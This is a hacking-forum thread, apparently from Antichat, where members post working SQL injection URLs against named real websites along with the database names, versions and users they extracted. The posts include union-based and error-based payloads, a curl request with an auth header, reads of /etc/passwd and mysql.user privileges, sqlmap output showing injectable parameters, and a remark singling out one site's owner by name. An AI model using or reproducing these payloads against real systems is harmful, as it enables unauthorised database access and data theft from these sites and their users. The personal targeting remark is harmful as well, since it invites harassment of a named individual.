SQL Injections

Discussion in 'Vulnerabilities' started by yarbabin, 27 Apr 2015.

  1. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    stanok
    Code:
    http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws(0x7c,database(),version(),user()),11,12,13,14,15,16,17,18,19,20
    ininterne1_stan|5.5.42-log|[email protected]

    some Spanish shop
    Code:
    http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-
    
    tecni_sitio|5.6.43|tecni@localhost
     
  2. BenderMR

    BenderMR Member

    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7c,database(),version(),user()),12,13,14,15,16,17,18,19,20,21--+-&type=2
    
    db_eircicai|5.5.51|koresoft@localhost

    and XSS right here as well
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cscript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
    
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    This is called SiXSS
     
  4. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Code:
    http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),database(),user()),19,20--
     
  5. DezMond™

    DezMond™ Elder

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+
     
  6. WallHack

    WallHack Elder

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -
     
  7. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    70
    Likes Received:
    14
    Reputations:
    8
    Code:
    https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
     
  8. BenderMR

    BenderMR Member

    MegaKeys.RU
    Code:
    https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(),version()),9,10--+-#&rtype=good&page=9
     
  9. sepo

    sepo Member

    Code:
    http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())+--+
     
  10. BenderMR

    BenderMR Member

    BChainHacks
    Code:
    https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
    bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
     
  11. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    Code:
    www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20
    
    5.5.52-MariaDB
    Code:
    https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
    
    5.5.61-0ubuntu0.14.04.1-log
    Code:
    https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
    
    5.5.60-MariaDB
     
  12. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    20
    Likes Received:
    22
    Reputations:
    8
  13. Pop-Xlop

    Pop-Xlop Member

    https://sarov.info Колючий Саров, Yandex IKS (formerly tIC) 3600

    Several SQL injections.
    First:
    Code:
    https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+--+1
    
    [email protected]:5.6.38:admin_bbnews
    Second:
    Code:
    curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%23%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"
    
    XPATH syntax error: ';5.6.38'
    The site's owner, Kirill Astashov aka BadBlock, is known in the Nizhny Novgorod region for fighting extremism in comments and then filing reports with Center "E".
     
  14. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Code:
    https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat(column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20
    
    5.5.55-0+deb8u1
    Code:
    www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name)),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20
    
    5.6.41-84.1
    Code:
    www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group_concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20
    
    5.5.60-MariaDB
    Code:
    www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),3,group_concat(table_name separator " ") from information_schema.tables where table_schema=database() --%20
    
    5.6.36-82.0
    Code:
    https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),9,10,11,12,13,14,15,16  from information_schema.columns where table_name='admin' and table_schema=database() --%20
    
    5.6.38
    Code:
    https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws(0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20
    
    5.6.32-78.1
    Code:
    https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20
    
    5.5.60-MariaDB
    Code:
    www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),group_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20
    
    5.7.27
    Code:
    https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20
    
    10.1.41-MariaDB
    Code:
    http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20
    
    5.6.45
    Code:
    https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema='compassbox'  --%20
    
    5.5.60-MariaDB
    Code:
    https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version(),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema='sys'--%20
    
    5.7.25
     
  15. Arn0ld SHeremetev

    Arn0ld SHeremetev New Member

    Joined:
    6 Sep 2019
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+
    
    version:
    5.6.25-73.1

    Code:
    https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
    

    version
    5.6.45


    Code:
    https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,22,23--+
    
    version 5.5.40

     
    #235 Arn0ld SHeremetev, 7 Sep 2019
    Last edited: 8 Sep 2019
  16. WallHack

    WallHack Elder

    Fragmented SQL injection in the spartak bux script; some pretty good projects run on it.

    ||extractvalue(1,concat(0x3a,(select @@version)))#


    List of vulnerable sites: (more can be found)

    POST request (for HackBar)

    For beginners

     
    #236 WallHack, 3 Oct 2019
    Last edited: 7 Oct 2019
  17. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    glassofvenice.com
    online store
    lots of interesting stuff inside.

    Code:
    
    https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
    
    
    Parameter: lp (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 9 columns
        Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
    ---
    web server operating system: Linux Debian 9.0 (stretch)
    web application technology: Apache 2.4.25
    back-end DBMS: MySQL >= 5.0
    
    
    Database: glassdb
    [145 tables]
    
     
  18. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    is the DB encrypted?
     
  19. RWD

    RWD Member

    fantasycruncher.com
    sports-themed site; privileges to read MySQL passwords and all databases

    Code:
    https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0
    
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
    ---
    
    web application technology: PHP 5.6.29, Nginx 1.10.1
    back-end DBMS: MySQL 5 (MariaDB fork)
    
    
     
    #239 RWD, 30 Oct 2019
    Last edited: 31 Oct 2019
  20. DezMond™

    DezMond™ Elder

    Code:
    http://www.wakecamp.ru/index.php?action=item&id=54+and+1=0+union+distinct+select+1,2+